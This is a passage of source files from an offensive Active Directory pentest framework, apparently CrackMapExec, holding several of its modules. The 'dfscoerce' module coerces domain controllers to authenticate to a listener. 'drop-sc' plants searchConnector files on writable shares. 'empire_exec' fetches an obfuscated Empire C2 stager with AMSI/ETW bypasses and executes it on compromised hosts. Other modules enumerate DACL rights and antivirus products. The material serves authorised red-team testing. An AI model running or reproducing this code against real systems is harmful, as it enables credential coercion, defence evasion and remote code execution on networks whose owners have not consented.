to realise on the DACL (read, backup)\n ACE_TYPE The type of ACE to read (Allowed or Denied)\n RIGHTS An interesting right to filter on ('FullControl', 'ResetPassword', 'WriteMembers', 'DCSync')\n RIGHTS_GUID A right GUID that specify a particular rights to filter on\n \"\"\"\n self.context = context\n\n if not module_options:\n context.log.fail(\"Select an option, example: -M daclread -o TARGET=Administrator ACTION=read\")\n exit(1)\n\n if module_options and \"TARGET\" in module_options:\n if re.search(r\"^(.+)\\/([^\\/]+)$\", module_options[\"TARGET\"]) is not None:\n try:\n self.target_file = open(module_options[\"TARGET\"], \"r\")\n self.target_sAMAccountName = None\n except Exception as e:\n context.log.fail(\"The file doesn't exist or cannot be openned.\")\n else:\n self.target_sAMAccountName = module_options[\"TARGET\"]\n self.target_file = None\n self.target_DN = None\n self.target_SID = None\n if module_options and \"TARGET_DN\" in module_options:\n self.target_DN = module_options[\"TARGET_DN\"]\n self.target_sAMAccountName = None\n self.target_file = None\n\n if module_options and \"PRINCIPAL\" in module_options:\n self.principal_sAMAccountName = module_options[\"PRINCIPAL\"]\n else:\n self.principal_sAMAccountName = None\n self.principal_sid = None\n\n if module_options and \"ACTION\" in module_options:\n self.action = module_options[\"ACTION\"]\n else:\n self.action = \"read\"\n if module_options and \"ACE_TYPE\" in module_options:\n self.ace_type = module_options[\"ACE_TYPE\"]\n else:\n self.ace_type = \"allowed\"\n if module_options and \"RIGHTS\" in module_options:\n self.rights = module_options[\"RIGHTS\"]\n else:\n self.rights = None\n if module_options and \"RIGHTS_GUID\" in module_options:\n self.rights_guid = module_options[\"RIGHTS_GUID\"]\n else:\n self.rights_guid = None\n self.filename = None\n\n def on_login(self, context, connection):\n \"\"\"\n On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified\n \"\"\"\n\n context.log.highlight(\"Be carefull, this module cannot read the DACLS recursively.\")\n self.baseDN = connection.ldapConnection._baseDN\n self.ldap_session = connection.ldapConnection\n\n # Searching for the principal SID\n if self.principal_sAMAccountName is not None:\n _lookedup_principal = self.principal_sAMAccountName\n try:\n self.principal_sid = format_sid(\n self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(sAMAccountName=%s)\" % escape_filter_chars(_lookedup_principal),\n attributes=[\"objectSid\"],\n )[0][\n 1\n ][0][\n 1\n ][0]\n )\n context.log.highlight(\"Found principal SID to filter on: %s\" % self.principal_sid)\n except Exception as e:\n context.log.fail(\"Principal SID not found in LDAP (%s)\" % _lookedup_principal)\n exit(1)\n\n # Searching for the targets SID and their Security Decriptors\n # If there is only one target\n if (self.target_sAMAccountName or self.target_DN) and self.target_file is None:\n # Searching for target account with its security descriptor\n try:\n self.search_target_principal_security_descriptor(context, connection)\n # Extract security descriptor data\n self.target_principal_dn = self.target_principal[0]\n self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode(\"latin-1\")\n self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)\n context.log.highlight(\"Target principal found in LDAP (%s)\" % self.target_principal[0])\n except Exception as e:\n context.log.fail(\"Target SID not found in LDAP (%s)\" % self.target_sAMAccountName)\n exit(1)\n\n if self.action == \"read\":\n self.read(context)\n if self.action == \"backup\":\n self.backup(context)\n\n # If there are multiple targets\n else:\n targets = self.target_file.readlines()\n for target in targets:\n try:\n self.target_sAMAccountName = target.strip()\n # Searching for target account with its security descriptor\n self.search_target_principal_security_descriptor(context, connection)\n # Extract security descriptor data\n self.target_principal_dn = self.target_principal[0]\n self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode(\"latin-1\")\n self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)\n context.log.highlight(\"Target principal found in LDAP (%s)\" % self.target_sAMAccountName)\n except Exception as e:\n context.log.fail(\"Target SID not found in LDAP (%s)\" % self.target_sAMAccountName)\n continue\n\n if self.action == \"read\":\n self.read(context)\n if self.action == \"backup\":\n self.backup(context)\n\n # Main read funtion\n # Prints the parsed DACL\n def read(self, context):\n parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor[\"Dacl\"])\n self.print_parsed_dacl(context, parsed_dacl)\n return\n\n # Permits to export the DACL of the targets\n # This function is called before any writing action (write, remove or restore)\n def backup(self, context):\n backup = {}\n backup[\"sd\"] = binascii.hexlify(self.principal_raw_security_descriptor).decode(\"latin-1\")\n backup[\"dn\"] = str(self.target_principal_dn)\n if not self.filename:\n self.filename = \"dacledit-%s-%s.bak\" % (\n datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"),\n self.target_sAMAccountName,\n )\n with codecs.open(self.filename, \"w\", \"latin-1\") as outfile:\n json.dump(backup, outfile)\n context.log.highlight(\"DACL backed up to %s\", self.filename)\n self.filename = None\n\n # Attempts to retrieve the DACL in the Security Descriptor of the specified target\n def search_target_principal_security_descriptor(self, context, connection):\n _lookedup_principal = \"\"\n # Set SD flags to only query for DACL\n controls = security_descriptor_control(sdflags=0x04)\n if self.target_sAMAccountName is not None:\n _lookedup_principal = self.target_sAMAccountName\n target = self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(sAMAccountName=%s)\" % escape_filter_chars(_lookedup_principal),\n attributes=[\"nTSecurityDescriptor\"],\n searchControls=controls,\n )\n if self.target_DN is not None:\n _lookedup_principal = self.target_DN\n target = self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(distinguishedName=%s)\" % _lookedup_principal,\n attributes=[\"nTSecurityDescriptor\"],\n searchControls=controls,\n )\n try:\n self.target_principal = target[0]\n except Exception as e:\n context.log.fail(\"Principal not found in LDAP (%s), probably an LDAP session issue.\" % _lookedup_principal)\n exit(0)\n\n # Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName\n # Not used for the moment\n # - samname : a sAMAccountName\n def get_user_info(self, context, samname):\n self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(sAMAccountName=%s)\" % escape_filter_chars(samname),\n attributes=[\"objectSid\"],\n )\n try:\n dn = self.ldap_session.entries[0].entry_dn\n sid = format_sid(self.ldap_session.entries[0][\"objectSid\"].raw_values[0])\n return dn, sid\n except Exception as e:\n context.log.fail(\"User not found in LDAP: %s\" % samname)\n return False\n\n # Attempts to resolve a SID and return the corresponding samaccountname\n # - sid : the SID to resolve\n def resolveSID(self, context, sid):\n # Tries to resolve the SID from the well known SIDs\n if sid in WELL_KNOWN_SIDS.keys():\n return WELL_KNOWN_SIDS[sid]\n # Tries to resolve the SID from the LDAP domain dump\n else:\n try:\n dn = self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(objectSid=%s)\" % sid,\n attributes=[\"sAMAccountName\"],\n )[\n 0\n ][0]\n samname = self.ldap_session.search(\n searchBase=self.baseDN,\n searchFilter=\"(objectSid=%s)\" % sid,\n attributes=[\"sAMAccountName\"],\n )[0][\n 1\n ][0][\n 1\n ][0]\n return samname\n except Exception as e:\n context.log.debug(\"SID not found in LDAP: %s\" % sid)\n return \"\"\n\n # Parses a full DACL\n # - dacl : the DACL to parse, submitted in a Security Desciptor format\n def parse_dacl(self, context, dacl):\n parsed_dacl = []\n context.log.debug(\"Parsing DACL\")\n i = 0\n for ace in dacl[\"Data\"]:\n parsed_ace = self.parse_ace(context, ace)\n parsed_dacl.append(parsed_ace)\n i += 1\n return parsed_dacl\n\n # Parses an access mask to extract the different values from a simple permission\n # https://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights\n # - fsr : the access mask to parse\n def parse_perms(self, fsr):\n _perms = []\n for PERM in SIMPLE_PERMISSIONS:\n if (fsr & PERM.value) == PERM.value:\n _perms.append(PERM.name)\n fsr = fsr & (not PERM.value)\n for PERM in ACCESS_MASK:\n if fsr & PERM.value:\n _perms.append(PERM.name)\n return _perms\n\n # Parses a specified ACE and extract the different values (Flags, Access Mask, Trustee, ObjectType, InheritedObjectType)\n # - ace : the ACE to parse\n def parse_ace(self, context, ace):\n # For the moment, only the Allowed and Denied Access ACE are supported\n if ace[\"TypeName\"] in [\n \"ACCESS_ALLOWED_ACE\",\n \"ACCESS_ALLOWED_OBJECT_ACE\",\n \"ACCESS_DENIED_ACE\",\n \"ACCESS_DENIED_OBJECT_ACE\",\n ]:\n parsed_ace = {}\n parsed_ace[\"ACE Type\"] = ace[\"TypeName\"]\n # Retrieves ACE's flags\n _ace_flags = []\n for FLAG in ACE_FLAGS:\n if ace.hasFlag(FLAG.value):\n _ace_flags.append(FLAG.name)\n parsed_ace[\"ACE flags\"] = \", \".join(_ace_flags) or \"None\"\n\n # For standard ACE\n # Extracts the access mask (by parsing the simple permissions) and the principal's SID\n if ace[\"TypeName\"] in [\"ACCESS_ALLOWED_ACE\", \"ACCESS_DENIED_ACE\"]:\n parsed_ace[\"Access mask\"] = \"%s (0x%x)\" % (\n \", \".join(self.parse_perms(ace[\"Ace\"][\"Mask\"][\"Mask\"])),\n ace[\"Ace\"][\"Mask\"][\"Mask\"],\n )\n parsed_ace[\"Trustee (SID)\"] = \"%s (%s)\" % (\n self.resolveSID(context, ace[\"Ace\"][\"Sid\"].formatCanonical()) or \"UNKNOWN\",\n ace[\"Ace\"][\"Sid\"].formatCanonical(),\n )\n\n # For object-specific ACE\n elif ace[\"TypeName\"] in [\n \"ACCESS_ALLOWED_OBJECT_ACE\",\n \"ACCESS_DENIED_OBJECT_ACE\",\n ]:\n # Extracts the mask values. These values will indicate the ObjectType purpose\n _access_mask_flags = []\n for FLAG in ALLOWED_OBJECT_ACE_MASK_FLAGS:\n if ace[\"Ace\"][\"Mask\"].hasPriv(FLAG.value):\n _access_mask_flags.append(FLAG.name)\n parsed_ace[\"Access mask\"] = \", \".join(_access_mask_flags)\n # Extracts the ACE flag values and the trusted SID\n _object_flags = []\n for FLAG in OBJECT_ACE_FLAGS:\n if ace[\"Ace\"].hasFlag(FLAG.value):\n _object_flags.append(FLAG.name)\n parsed_ace[\"Flags\"] = \", \".join(_object_flags) or \"None\"\n # Extracts the ObjectType GUID values\n if ace[\"Ace\"][\"ObjectTypeLen\"] != 0:\n obj_type = bin_to_string(ace[\"Ace\"][\"ObjectType\"]).lower()\n try:\n parsed_ace[\"Object type (GUID)\"] = \"%s (%s)\" % (\n OBJECT_TYPES_GUID[obj_type],\n obj_type,\n )\n except KeyError:\n parsed_ace[\"Object type (GUID)\"] = \"UNKNOWN (%s)\" % obj_type\n # Extracts the InheritedObjectType GUID values\n if ace[\"Ace\"][\"InheritedObjectTypeLen\"] != 0:\n inh_obj_type = bin_to_string(ace[\"Ace\"][\"InheritedObjectType\"]).lower()\n try:\n parsed_ace[\"Inherited type (GUID)\"] = \"%s (%s)\" % (\n OBJECT_TYPES_GUID[inh_obj_type],\n inh_obj_type,\n )\n except KeyError:\n parsed_ace[\"Inherited type (GUID)\"] = \"UNKNOWN (%s)\" % inh_obj_type\n # Extract the Trustee SID (the object that has the right over the DACL bearer)\n parsed_ace[\"Trustee (SID)\"] = \"%s (%s)\" % (\n self.resolveSID(context, ace[\"Ace\"][\"Sid\"].formatCanonical()) or \"UNKNOWN\",\n ace[\"Ace\"][\"Sid\"].formatCanonical(),\n )\n\n else:\n # If the ACE is not an access allowed\n context.log.debug(\"ACE Type (%s) unsupported for parsing yet, feel free to contribute\" % ace[\"TypeName\"])\n parsed_ace = {}\n parsed_ace[\"ACE type\"] = ace[\"TypeName\"]\n _ace_flags = []\n for FLAG in ACE_FLAGS:\n if ace.hasFlag(FLAG.value):\n _ace_flags.append(FLAG.name)\n parsed_ace[\"ACE flags\"] = \", \".join(_ace_flags) or \"None\"\n parsed_ace[\"DEBUG\"] = \"ACE type not supported for parsing by dacleditor.py, feel free to contribute\"\n return parsed_ace\n\n # Prints a full DACL by printing each parsed ACE\n # - parsed_dacl : a parsed DACL from parse_dacl()\n def print_parsed_dacl(self, context, parsed_dacl):\n context.log.debug(\"Printing parsed DACL\")\n i = 0\n # If a specific right or a specific GUID has been specified, only the ACE with this right will be printed\n # If an ACE type has been specified, only the ACE with this type will be specified\n # If a principal has been specified, only the ACE where he is the trustee will be printed\n for parsed_ace in parsed_dacl:\n print_ace = True\n # Filter on specific rights\n if self.rights is not None:\n try:\n if (self.rights == \"FullControl\") and (self.rights not in parsed_ace[\"Access mask\"]):\n print_ace = False\n if (self.rights == \"DCSync\") and ((\"Object type (GUID)\" not in parsed_ace) or (RIGHTS_GUID.DS_Replication_Get_Changes_All.value not in parsed_ace[\"Object type (GUID)\"])):\n print_ace = False\n if (self.rights == \"WriteMembers\") and ((\"Object type (GUID)\" not in parsed_ace) or (RIGHTS_GUID.WriteMembers.value not in parsed_ace[\"Object type (GUID)\"])):\n print_ace = False\n if (self.rights == \"ResetPassword\") and ((\"Object type (GUID)\" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace[\"Object type (GUID)\"])):\n print_ace = False\n except Exception as e:\n context.log.fail(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n\n # Filter on specific right GUID\n if self.rights_guid is not None:\n try:\n if (\"Object type (GUID)\" not in parsed_ace) or (self.rights_guid not in parsed_ace[\"Object type (GUID)\"]):\n print_ace = False\n except Exception as e:\n context.log.fail(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n\n # Filter on ACE type\n if self.ace_type == \"allowed\":\n try:\n if (\"ACCESS_ALLOWED_OBJECT_ACE\" not in parsed_ace[\"ACE Type\"]) and (\"ACCESS_ALLOWED_ACE\" not in parsed_ace[\"ACE Type\"]):\n print_ace = False\n except Exception as e:\n context.log.fail(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n else:\n try:\n if (\"ACCESS_DENIED_OBJECT_ACE\" not in parsed_ace[\"ACE Type\"]) and (\"ACCESS_DENIED_ACE\" not in parsed_ace[\"ACE Type\"]):\n print_ace = False\n except Exception as e:\n context.log.fail(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n\n # Filter on trusted principal\n if self.principal_sid is not None:\n try:\n if self.principal_sid not in parsed_ace[\"Trustee (SID)\"]:\n print_ace = False\n except Exception as e:\n context.log.fail(\"Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)\" % e)\n if print_ace:\n self.context.log.highlight(\"%-28s\" % \"ACE[%d] info\" % i)\n self.print_parsed_ace(parsed_ace)\n i += 1\n\n # Prints properly a parsed ACE\n # - parsed_ace : a parsed ACE from parse_ace()\n def print_parsed_ace(self, parsed_ace):\n elements_name = list(parsed_ace.keys())\n for attribute in elements_name:\n self.context.log.highlight(\" %-26s: %s\" % (attribute, parsed_ace[attribute]))\n\n # Retrieves the GUIDs for the specified rights\n def build_guids_for_rights(self):\n _rights_guids = []\n if self.rights_guid is not None:\n _rights_guids = [self.rights_guid]\n elif self.rights == \"WriteMembers\":\n _rights_guids = [RIGHTS_GUID.WriteMembers.value]\n elif self.rights == \"ResetPassword\":\n _rights_guids = [RIGHTS_GUID.ResetPassword.value]\n elif self.rights == \"DCSync\":\n _rights_guids = [\n RIGHTS_GUID.DS_Replication_Get_Changes.value,\n RIGHTS_GUID.DS_Replication_Get_Changes_All.value,\n ]\n self.context.log.highlight(\"Built GUID: %s\", _rights_guids)\n return _rights_guids\n" }, { "path": "cme/modules/dfscoerce.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.ndr import NDRCALL\nfrom impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import uuidtup_to_bin\nfrom cme.logger import cme_logger\n\n\nclass CMEModule:\n name = \"dfscoerce\"\n description = \"Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.listener = None\n\n def options(self, context, module_options):\n \"\"\"\n LISTENER Listener Address (defaults to 127.0.0.1)\n \"\"\"\n self.listener = \"127.0.0.1\"\n if \"LISTENER\" in module_options:\n self.listener = module_options[\"LISTENER\"]\n\n def on_login(self, context, connection):\n trigger = TriggerAuth()\n dce = trigger.connect(\n username=connection.username,\n password=connection.password,\n domain=connection.domain,\n lmhash=connection.lmhash,\n nthash=connection.nthash,\n target=connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain,\n doKerberos=connection.kerberos,\n dcHost=connection.kdcHost,\n aesKey=connection.aesKey,\n )\n\n if dce is not None:\n context.log.debug(\"Target is vulnerable to DFSCoerce\")\n trigger.NetrDfsRemoveStdRoot(dce, self.listener)\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://github.com/Wh04m1001/DFSCoerce\")\n dce.disconnect()\n\n else:\n context.log.debug(\"Target is not vulnerable to DFSCoerce\")\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return \"DFSNM SessionError: code: 0x%x - %s - %s\" % (\n self.error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"DFSNM SessionError: unknown error code: 0x%x\" % self.error_code\n\n\n################################################################################\n# RPC CALLS\n################################################################################\nclass NetrDfsRemoveStdRoot(NDRCALL):\n opnum = 13\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsRemoveStdRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass NetrDfsAddRoot(NDRCALL):\n opnum = 12\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"Comment\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsAddRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass TriggerAuth:\n def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):\n rpctransport = transport.DCERPCTransportFactory(r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n if hasattr(rpctransport, \"set_credentials\"):\n rpctransport.set_credentials(\n username=username,\n password=password,\n domain=domain,\n lmhash=lmhash,\n nthash=nthash,\n aesKey=aesKey,\n )\n\n if doKerberos:\n rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)\n # if target:\n # rpctransport.setRemoteHost(target)\n\n rpctransport.setRemoteHost(target)\n dce = rpctransport.get_dce_rpc()\n cme_logger.debug(\"[-] Connecting to %s\" % r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n try:\n dce.connect()\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n return\n try:\n dce.bind(uuidtup_to_bin((\"4FC742E0-4A10-11CF-8273-00AA004AE673\", \"3.0\")))\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n return\n cme_logger.debug(\"[+] Successfully bound!\")\n return dce\n\n def NetrDfsRemoveStdRoot(self, dce, listener):\n cme_logger.debug(\"[-] Sending NetrDfsRemoveStdRoot!\")\n try:\n request = NetrDfsRemoveStdRoot()\n request[\"ServerName\"] = \"%s\\x00\" % listener\n request[\"RootShare\"] = \"test\\x00\"\n request[\"ApiFlags\"] = 1\n if self.args.verbose:\n cme_logger.debug(request.dump())\n # logger.debug(request.dump())\n resp = dce.request(request)\n\n except Exception as e:\n cme_logger.debug(e)\n" }, { "path": "cme/modules/drop-sc.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\n\n\nclass CMEModule:\n \"\"\"\n Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.\n https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/\n Module by @zblurx\n \"\"\"\n\n name = \"drop-sc\"\n description = \"Drop a searchConnector-ms file on each writable share\"\n supported_protocols = [\"smb\"]\n opsec_safe = False\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.\n https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/\n Module by @zblurx\n URL URL in the searchConnector-ms file, default https://rickroll\n CLEANUP Cleanup (choices: True or False)\n SHARE Specify a share to target\n FILENAME Specify the filename used WITHOUT the extension searchConnector-ms (it's automatically added), default is \"Documents\"\n \"\"\"\n self.cleanup = False\n if \"CLEANUP\" in module_options:\n self.cleanup = bool(module_options[\"CLEANUP\"])\n\n self.url = \"https://rickroll\"\n if \"URL\" in module_options:\n self.url = str(module_options[\"URL\"])\n\n self.sharename = \"\"\n if \"SHARE\" in module_options:\n self.sharename = str(module_options[\"SHARE\"])\n\n self.filename = \"Documents\"\n if \"FILENAME\" in module_options:\n self.filename = str(module_options[\"FILENAME\"])\n\n self.file_path = ntpath.join(\"\\\\\", f\"{self.filename}.searchConnector-ms\")\n if not self.cleanup:\n self.scfile_path = f\"/tmp/{self.filename}.searchConnector-ms\"\n scfile = open(self.scfile_path, \"w\")\n scfile.truncate(0)\n scfile.write('')\n scfile.write(\"')\n scfile.write(\"Microsoft Outlook\")\n scfile.write(\"false\")\n scfile.write(\"true\")\n scfile.write(f\"{self.url}/0001.ico\")\n scfile.write(\"\")\n scfile.write(\"{91475FE5-586B-4EBA-8D75-D17434B8CDF6}\")\n scfile.write(\"\")\n scfile.write(\"\")\n scfile.write(\"{}\".format(self.url))\n scfile.write(\"\")\n scfile.write(\"\")\n scfile.close()\n\n def on_login(self, context, connection):\n shares = connection.shares()\n for share in shares:\n context.log.debug(f\"Share: {share}\")\n if \"WRITE\" in share[\"access\"] and (share[\"name\"] == self.sharename if self.sharename != \"\" else share[\"name\"] not in [\"C$\", \"ADMIN$\"]):\n context.log.success(f\"Found writable share: {share['name']}\")\n if not self.cleanup:\n with open(self.scfile_path, \"rb\") as scfile:\n try:\n connection.conn.putFile(share[\"name\"], self.file_path, scfile.read)\n context.log.success(f\"[OPSEC] Created {self.filename}.searchConnector-ms\" f\" file on the {share['name']} share\")\n except Exception as e:\n context.log.exception(e)\n context.log.fail(f\"Error writing {self.filename}.searchConnector-ms file\" f\" on the {share['name']} share: {e}\")\n else:\n try:\n connection.conn.deleteFile(share[\"name\"], self.file_path)\n context.log.success(f\"Deleted {self.filename}.searchConnector-ms file on the\" f\" {share['name']} share\")\n except Exception as e:\n context.log.fail(f\"[OPSEC] Error deleting {self.filename}.searchConnector-ms\" f\" file on share {share['name']}: {e}\")\n" }, { "path": "cme/modules/empire_exec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport requests\nfrom requests import ConnectionError\n\n# The following disables the InsecureRequests warning and the 'Starting new HTTPS connection' log message\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass CMEModule:\n \"\"\"\n Uses Empire's RESTful API to generate a launcher for the specified listener and executes it\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"empire_exec\"\n description = \"Uses Empire's RESTful API to generate a launcher for the specified listener and executes it\"\n supported_protocols = [\"smb\", \"mssql\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n LISTENER Listener name to generate the launcher for\n SSL True if the listener is using SSL/TLS\n OBFUSCATE True if you want to use the built-in Obfuscation (that calls Invoke-Obfuscate)\n OBFUSCATE_CMD Override Invoke-Obfuscation command (Default is \"Token,All,1\" and is picked up by Defender)\n \"\"\"\n self.empire_launcher = None\n\n if \"LISTENER\" not in module_options:\n context.log.fail(\"LISTENER option is required!\")\n sys.exit(1)\n\n api_proto = \"https\" if \"SSL\" in module_options else \"http\"\n\n obfuscate = True if \"OBFUSCATE\" in module_options else False\n # we can use commands instead of backslashes - this is because Linux and OSX treat them differently\n default_obfuscation = \"Token,All,1\"\n obfuscate_cmd = module_options[\"OBFUSCATE_CMD\"] if \"OBFUSCATE_CMD\" in module_options else default_obfuscation\n context.log.debug(f\"Obfuscate: {obfuscate} - Obfuscate_cmd: {obfuscate_cmd}\")\n\n # Pull the host and port from the config file\n base_url = f\"{api_proto}://{context.conf.get('Empire', 'api_host')}:{context.conf.get('Empire', 'api_port')}\"\n context.log.debug(f\"Empire URL: {base_url}\")\n\n # Pull the username and password from the config file\n empire_creds = {\n \"username\": context.conf.get(\"Empire\", \"username\"),\n \"password\": context.conf.get(\"Empire\", \"password\"),\n }\n context.log.debug(f\"Empire Creds: {empire_creds}\")\n\n try:\n login_response = requests.post(\n f\"{base_url}/token\",\n data=empire_creds,\n verify=False,\n )\n except ConnectionError as e:\n context.log.fail(f\"Unable to login to Empire's RESTful API: {e}\")\n sys.exit(1)\n context.log.debug(f\"Response Code: {login_response.status_code}\")\n context.log.debug(f\"Response Content: {login_response.text}\")\n\n if login_response.status_code == 200:\n access_token = login_response.json()[\"access_token\"]\n headers = {\"Authorization\": f\"Bearer {access_token}\"}\n else:\n context.log.fail(\"Error authenticating to Empire's RESTful API\")\n sys.exit(1)\n\n data = {\n \"name\": \"cme_ephemeral\",\n \"template\": \"multi_launcher\",\n \"options\": {\n \"Listener\": module_options[\"LISTENER\"],\n \"Language\": \"powershell\",\n \"StagerRetries\": \"0\",\n \"OutFile\": \"\",\n \"Base64\": \"True\",\n \"Obfuscate\": obfuscate,\n \"ObfuscateCommand\": obfuscate_cmd,\n \"SafeChecks\": \"True\",\n \"UserAgent\": \"default\",\n \"Proxy\": \"default\",\n \"ProxyCreds\": \"default\",\n \"Bypasses\": \"mattifestation etw\",\n },\n }\n try:\n stager_response = requests.post(\n f\"{base_url}/api/v2/stagers?save=False\",\n json=data,\n headers=headers,\n verify=False,\n )\n except ConnectionError:\n context.log.fail(f\"Unable to request stager from Empire's RESTful API\")\n sys.exit(1)\n\n if stager_response.status_code not in [200, 201]:\n if \"not found\" in stager_response.json()[\"detail\"]:\n context.log.fail(f\"Listener {module_options['LISTENER']} not found\")\n else:\n context.log.fail(f\"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}\")\n sys.exit(1)\n\n context.log.debug(f\"Response Code: {stager_response.status_code}\")\n # context.log.debug(f\"Response Content: {stager_response.text}\")\n\n stager_create_data = stager_response.json()\n context.log.debug(f\"Stager data: {stager_create_data}\")\n download_uri = stager_create_data[\"downloads\"][0][\"link\"]\n\n download_response = requests.get(\n f\"{base_url}{download_uri}\",\n headers=headers,\n verify=False,\n )\n context.log.debug(f\"Response Code: {download_response.status_code}\")\n # context.log.debug(f\"Response Content: {download_response.text}\")\n\n self.empire_launcher = download_response.text\n\n if download_response.status_code == 200:\n context.log.success(f\"Successfully generated launcher for listener '{module_options['LISTENER']}'\")\n else:\n context.log.fail(f\"Something went wrong when retrieving stager Powershell command\")\n\n def on_admin_login(self, context, connection):\n if self.empire_launcher:\n connection.execute(self.empire_launcher)\n context.log.success(\"Executed Empire Launcher\")\n" }, { "path": "cme/modules/enum_av.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# All credit to @an0n_r0\n# project : https://github.com/tothi/serviceDetector\n\nfrom impacket.dcerpc.v5 import lsat, lsad\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED, RPC_UNICODE_STRING\nfrom impacket.dcerpc.v5 import transport\nimport pathlib\n\n\nclass CMEModule:\n \"\"\"\n Uses LsarLookupNames and NamedPipes to gather information on all endpoint protection solutions installed on the the remote host(s)\n Module by @mpgn_x64\n \"\"\"\n\n name = \"enum_av\"\n description = \"Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n pass\n\n def on_login(self, context, connection):\n success = 0\n results = {}\n target = connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain\n context.log.debug(\"Detecting installed services on {} using LsarLookupNames()...\".format(target))\n\n try:\n lsa = LsaLookupNames(\n connection.domain,\n connection.username,\n connection.password,\n target,\n connection.kerberos,\n connection.domain,\n connection.lmhash,\n connection.nthash,\n connection.aesKey,\n )\n dce, rpctransport = lsa.connect()\n policyHandle = lsa.open_policy(dce)\n\n for i, product in enumerate(conf[\"products\"]):\n for service in product[\"services\"]:\n try:\n lsa.LsarLookupNames(dce, policyHandle, service[\"name\"])\n context.log.info(f\"Detected installed service on {connection.host}: {product['name']} {service['description']}\")\n if product[\"name\"] not in results:\n results[product[\"name\"]] = {\"services\": []}\n results[product[\"name\"]][\"services\"].append(service)\n except Exception as e:\n pass\n success += 1\n except Exception as e:\n context.log.fail(str(e))\n\n context.log.info(f\"Detecting running processes on {connection.host} by enumerating pipes...\")\n try:\n for f in connection.conn.listPath(\"IPC$\", \"\\\\*\"):\n fl = f.get_longname()\n for i, product in enumerate(conf[\"products\"]):\n for pipe in product[\"pipes\"]:\n if pathlib.PurePath(fl).match(pipe[\"name\"]):\n context.log.debug(f\"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})\")\n if product[\"name\"] not in results:\n results[product[\"name\"]] = {}\n if \"pipes\" not in results[product[\"name\"]]:\n results[product[\"name\"]][\"pipes\"] = []\n 